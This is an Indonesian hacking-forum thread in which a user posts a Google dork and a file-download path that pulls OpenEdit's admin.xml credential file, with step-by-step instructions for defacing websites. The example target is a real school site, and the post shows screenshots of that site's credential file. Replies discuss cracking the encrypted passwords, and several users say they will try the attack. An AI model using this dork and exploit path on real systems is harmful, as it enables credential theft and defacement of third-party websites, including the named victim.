[Deface] Exploit Openedit

**dvil** · 09-29-2012, 05:24 PM

#] Dorknya :

inurl:openedit/authentication/

[#] Exploitnya :

/openedit/files/download/WEB-INF/users/admin.xml

langsung saja gak usah banyak basa-basi lagi ..
kita langsung masuk step by step cara defacenya ..
kalo berhasil deface , Ya Selamat , hahhahaha Big Grin

========
[#] Step 1
========
- Kita Menuju Google Lalu masukan dork diatas , oh iya silakan explore sendiri dorknya biar lebih mantap
========
[#] Step 2
========
- Pilih salah satu target digoogle tadi
Example : http://www.stpetersprestbury.org.uk
========
[#] Step 3
========
- Masukan Exploitnya Tadi
jadinya kek gini ni :
http://www.stpetersprestbury.org.uk/open.../admin.xml

========
[#] Step 4
========
- nah , kamu akan otomatis mengunduh sebuah file XML
setelah diunduh buka File XML yang unduh kamu tadi

========
[#] Step 5
========
- Didalam File XML tu ada Password Dan Username Admin sono .
Ni contohnya aneh dapet dari target atas tadi

[Image: 183446_445772772142248_1895342459_n.jpg]

[Image: 183446_445772772142248_1895342459_n.jpg]

:badpc:paswordnya aduhh...:badpc:

**THJC** · 09-29-2012, 08:48 PM

wih, xmlnya kebuka.
itu kan bukan plain textnya om Smile

itu masih dibalut hash/enkripsi Smile

**Junior Riau** · 09-29-2012, 09:06 PM

(09-29-2012, 05:24 PM)dvil Wrote: #] Dorknya :

inurl:openedit/authentication/

[#] Exploitnya :

/openedit/files/download/WEB-INF/users/admin.xml

langsung saja gak usah banyak basa-basi lagi ..
kita langsung masuk step by step cara defacenya ..
kalo berhasil deface , Ya Selamat , hahhahaha

========
[#] Step 1
========
- Kita Menuju Google Lalu masukan dork diatas , oh iya silakan explore sendiri dorknya biar lebih mantap
========
[#] Step 2
========
- Pilih salah satu target digoogle tadi
Example : http://www.stpetersprestbury.org.uk
========
[#] Step 3
========
- Masukan Exploitnya Tadi
jadinya kek gini ni :
http://www.stpetersprestbury.org.uk/open.../admin.xml

========
[#] Step 4
========
- nah , kamu akan otomatis mengunduh sebuah file XML
setelah diunduh buka File XML yang unduh kamu tadi

========
[#] Step 5
========
- Didalam File XML tu ada Password Dan Username Admin sono .
Ni contohnya aneh dapet dari target atas tadi

:badpc:paswordnya aduhh...:badpc:

ini mirip xpath injection, ane pernah coba xpath injection dan emang ngejarnya ke .xml file juga hiihi

nice share tapi anda kurangberuntung ^_^ g semua yang berada di xml itu bersih, alias tanpa enkripsi

**Udalah**$ · 09-29-2012, 10:45 PM

hoho ada enkripsinya ya, itu jenis enkripsinya apa yah? gw ga apal wwowokwokwok

iKONspirasi · 09-30-2012, 04:55 AM

(09-29-2012, 10:45 PM)Udalah Wrote: hoho ada enkripsinya ya, itu jenis enkripsinya apa yah? gw ga apal wwowokwokwok

di gambarnya ada tulisan DES, ane rasa itu enkripsinya, ayo dicoba crack Big Grin

btw enkripsi beda dengan hash lho ya Smile

**dvil** · 09-30-2012, 10:20 AM

bedanya gmn om ikon
saya tidak isa crack macm enkrimsi ato md5

**yanumulti**$ · 12-16-2012, 06:16 PM

ini passwordnya gimana ngatasinya ya???

**Orphan Walker** · 03-06-2013, 07:34 PM

dorknya mantap tapi decryptnya masih binun bejibun....

**blAnk_pag3** · 03-06-2013, 10:34 PM

bisa dicoba dulu neh bang Smile

**sector-seven** · 03-07-2013, 04:58 PM

wedewww izin coba ya ommmmmmmm